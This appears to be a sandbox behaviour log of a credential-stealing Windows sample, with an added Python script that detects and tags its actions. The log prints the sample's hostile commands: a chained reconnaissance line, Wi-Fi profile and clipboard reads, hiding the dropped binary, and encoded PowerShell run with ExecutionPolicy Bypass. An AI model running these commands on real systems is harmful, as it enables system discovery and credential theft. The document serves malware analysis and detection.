            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
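The "Process created" rows above are the whole of this stealer's host-side activity: WMI hardware queries to fingerprint the machine, a single cmd.exe /c line that chains sixteen discovery commands with "&", attrib +h +s to hide the dropped Exela.exe, netsh wlan show profiles and Get-Clipboard for credential access, and finally powershell.exe -ExecutionPolicy Bypass -EncodedCommand. The script below is an added example, not part of the Joe Sandbox report or of the Exela code: it parses rows in exactly the format shown (tolerating the fused "exeProcess created:" cells the extraction produced), tags those behaviours, and decodes the -EncodedCommand blob as base64 of UTF-16LE, which is how PowerShell defines that parameter. The input rows are constructed to mirror the report (the recon chain is abridged), and because the report elides the real encoded payload, the example substitutes a labelled placeholder script; the tag names, thresholds and the sample.exe path are the example's own.

```python
import base64
import re

# One Joe Sandbox "Process created" row. Extraction fuses the Source cell
# onto "Process created:", so the separator between them is optional.
ROW_RE = re.compile(
    r"Source:\s*(?P<parent>.+?\.exe)\s*Process created:\s*(?P<image>\S+)\s*(?P<cmdline>.*)$",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob; the \b keeps
# "-ExecutionPolicy" from being taken as the short "-e" alias.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
BYPASS_RE = re.compile(r"-ExecutionPolicy\s+Bypass", re.IGNORECASE)
ATTRIB_RE = re.compile(r'attrib\s+(?:\+[hs]\s+)+"?([^"]+)"?', re.IGNORECASE)
WRAPPER_RE = re.compile(r'^.*?cmd(?:\.exe)?\s+/c\s+"?', re.IGNORECASE)

# Host/network discovery commands the report shows chained through one cmd.exe.
DISCOVERY = (
    "systeminfo", "ver", "hostname", "set", "wmic logicaldisk", "net user",
    "query user", "net localgroup", "wmic startup", "tasklist", "ipconfig",
    "route print", "arp -a", "netstat", "sc query", "netsh firewall",
)
# WMI hardware queries the sample uses to fingerprint VMs/sandboxes.
HW_FINGERPRINT = ("win32_videocontroller", "computersystem get manufacturer", "csproduct get uuid")
RECON_CHAIN_MIN = 5  # distinct discovery commands in one line before calling it a chain (example threshold)


def parse_row(line: str):
    """Split one report row into parent image, child image and child command line."""
    m = ROW_RE.search(line)
    return m.groupdict() if m else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def classify(cmdline: str) -> dict:
    """Return {tag: detail} for the behaviours worth surfacing from one command line."""
    tags = {}
    low = cmdline.lower()
    inner = WRAPPER_RE.sub("", cmdline)  # strip the leading cmd.exe /c "..." wrapper
    segments = [s.strip(' "').lower() for s in inner.split("&")]
    seen = {p for p in DISCOVERY for s in segments if s.startswith(p)}
    if len(seen) >= RECON_CHAIN_MIN:
        tags["recon_chain"] = sorted(seen)
    if any(k in low for k in HW_FINGERPRINT):
        tags["hw_fingerprint"] = inner.strip(' "')
    if "netsh wlan show profiles" in low:
        tags["wifi_profiles"] = True
    if "get-clipboard" in low:
        tags["clipboard"] = True
    m = ATTRIB_RE.search(cmdline)
    if m:
        tags["hidden_file"] = m.group(1)
    if BYPASS_RE.search(cmdline):
        tags["execution_policy_bypass"] = True
    m = ENCODED_RE.search(cmdline)
    if m:
        try:
            tags["encoded_powershell"] = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            tags["encoded_powershell"] = "<undecodable: " + m.group(1)[:16] + "...>"
    return tags


def triage(lines):
    """Parse every row and keep those whose child command line carries at least one tag."""
    findings = []
    for line in lines:
        row = parse_row(line)
        if not row:
            continue
        tags = classify(row["cmdline"])
        if tags:
            findings.append({"parent": row["parent"], "image": row["image"], "tags": tags})
    return findings


# Constructed stand-in for the elided -EncodedCommand payload: the real script is not
# visible in the report, so this placeholder is NOT the malware's code.
PLACEHOLDER_SCRIPT = "Write-Output 'placeholder, not the real payload'"
PLACEHOLDER_B64 = base64.b64encode(PLACEHOLDER_SCRIPT.encode("utf-16-le")).decode()

# Rows constructed to mirror the report (sample.exe stands in for the submitted file;
# the recon chain is abridged).
SAMPLE_ROWS = [
    r"Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r'Source: C:\Users\user\Desktop\sample.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"',
    r'Source: C:\Users\user\Desktop\sample.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""',
    r'Source: C:\Users\user\Desktop\sample.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & ver & hostname & set'
    r" & wmic logicaldisk get caption,description,providername & net user & query user & net localgroup & wmic startup get caption,command"
    r' & tasklist /svc & ipconfig/all & route print & arp -a & netstat -ano & sc query type= service state= all & netsh firewall show state"',
    r'Source: C:\Users\user\Desktop\sample.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"',
    r'Source: C:\Users\user\Desktop\sample.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"',
    r'Source: C:\Users\user\Desktop\sample.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand '
    + PLACEHOLDER_B64 + '"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f["image"], f["tags"])
```

Running it on the constructed rows yields six findings: the conhost row produces no tags, the chain row is tagged recon_chain with all sixteen discovery commands, and the last row is tagged both execution_policy_bypass and encoded_powershell with the decoded placeholder. On a real report, feed it the rows as extracted; rows whose payload was elided will come back as "undecodable" rather than silently dropped.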
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: libffi-7.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: sqlite3.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: libcrypto-1_1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: libssl-1_1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: sbiedll.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
